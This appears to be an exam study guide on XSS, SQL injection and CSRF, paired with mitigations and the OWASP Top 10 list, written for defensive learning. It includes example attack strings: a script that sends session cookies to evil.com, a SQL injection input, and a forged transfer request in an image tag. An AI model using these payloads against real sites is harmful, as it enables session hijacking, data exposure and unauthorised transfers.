Mental model
OWASP (Open Web Application Security Project) publishes the Top 10 list of common web app security risks. Cisco objective 4.10 calls out three specifically: XSS, SQL injection, CSRF. These are classic attacks every developer must know.
XSS (Cross-Site Scripting)
Attack: The app displays user-supplied text without escaping it, so attacker-supplied text containing <script>...</script> runs in another user’s browser.
Example
A help-desk ticket form stores the user’s name and shows it on every subsequent page:
Hello, <%= user.name %>
Attacker signs up with name <script>fetch('https://evil.com/steal?c='+document.cookie)</script>.
Any admin who opens the ticket runs that script in their browser, under the app’s domain. The attacker gets the admin’s session cookie.
Mitigation
- Escape output. Modern frameworks (React, Vue, Django templates, Jinja2) escape by default. Avoid
dangerouslySetInnerHTML/|safe. - Content-Security-Policy header: tells the browser not to execute scripts from arbitrary sources.
- HttpOnly cookies so JavaScript cannot read session cookies even if XSS fires.
SQL injection (SQLi)
Attack: The app builds a SQL query by concatenating strings. User input ends up inside the query, changing its meaning.
Example (bad)
cursor.execute(f"SELECT * FROM users WHERE name = '{name}'")
Attacker enters admin' OR '1'='1. Resulting query:
SELECT * FROM users WHERE name = 'admin' OR '1'='1'
That returns every user.
Mitigation
- Parameterized queries (also called prepared statements). The DB engine knows which bits are code and which are data.
# Python with sqlite3 / psycopg2 / mysql-connector
cursor.execute("SELECT * FROM users WHERE name = %s", (name,))
- ORMs (SQLAlchemy, Django ORM) parameterize automatically. Prefer them over raw SQL.
- Minimum privilege: the app’s DB user should not be able to drop tables.
CSRF (Cross-Site Request Forgery)
Attack: User is logged into Site A (your bank) in one tab. User visits Site B (attacker’s) in another tab. Site B embeds <img src="https://bank.example.com/transfer?to=attacker&amount=1000">. The user’s browser attaches the bank’s cookies and the transfer goes through.
Mitigation
- Anti-CSRF tokens. Server sends a one-time token with every form; attacker cannot know the token in advance.
- SameSite cookies. Set
Set-Cookie: ...; SameSite=Lax(default in modern browsers). Cookies are not sent on cross-site requests. - Prefer POST for state-changing operations (CSRF against POST is harder than GET).
- Modern frameworks (Django, Rails, Spring Security) ship with CSRF middleware on by default.
The three in one table
| Threat | Root cause | Mitigation |
|---|---|---|
| XSS | Rendering untrusted text as HTML / JS | Escape on output, CSP, HttpOnly cookies |
| SQL injection | Concatenating strings into SQL | Parameterized queries / ORMs |
| CSRF | Browser attaches cookies to any request to the cookie’s domain | CSRF tokens, SameSite cookies |
The wider OWASP Top 10 (good career knowledge)
Current OWASP Top 10 (A01 to A10):
| Code | Risk |
|---|---|
| A01 | Broken Access Control |
| A02 | Cryptographic Failures |
| A03 | Injection (includes SQLi, XSS) |
| A04 | Insecure Design |
| A05 | Security Misconfiguration |
| A06 | Vulnerable and Outdated Components |
| A07 | Identification and Authentication Failures |
| A08 | Software and Data Integrity Failures |
| A09 | Security Logging and Monitoring Failures |
| A10 | Server-Side Request Forgery (SSRF) |
For the exam, know the three Cisco calls out (XSS, SQLi, CSRF). The rest are useful background.
FAQ
Does XSS matter if my app only serves logged-in employees? Yes. The impact is often worse — stealing an admin’s session is more valuable than a random user’s.
Can an ORM get me SQL injection? Not if used properly. Trouble starts when you drop to raw() or build strings with user input and pass them to text().
Is CSRF relevant for API-only backends? Less so. APIs usually use token auth in a header (not cookie), so a cross-site browser request cannot attach credentials. Still, consider double-submit tokens or Origin header validation.
Where do I learn more? owasp.org has free cheat sheets for every risk. For hands-on practice, OWASP Juice Shop is a deliberately broken app you can attack safely in a Docker container.
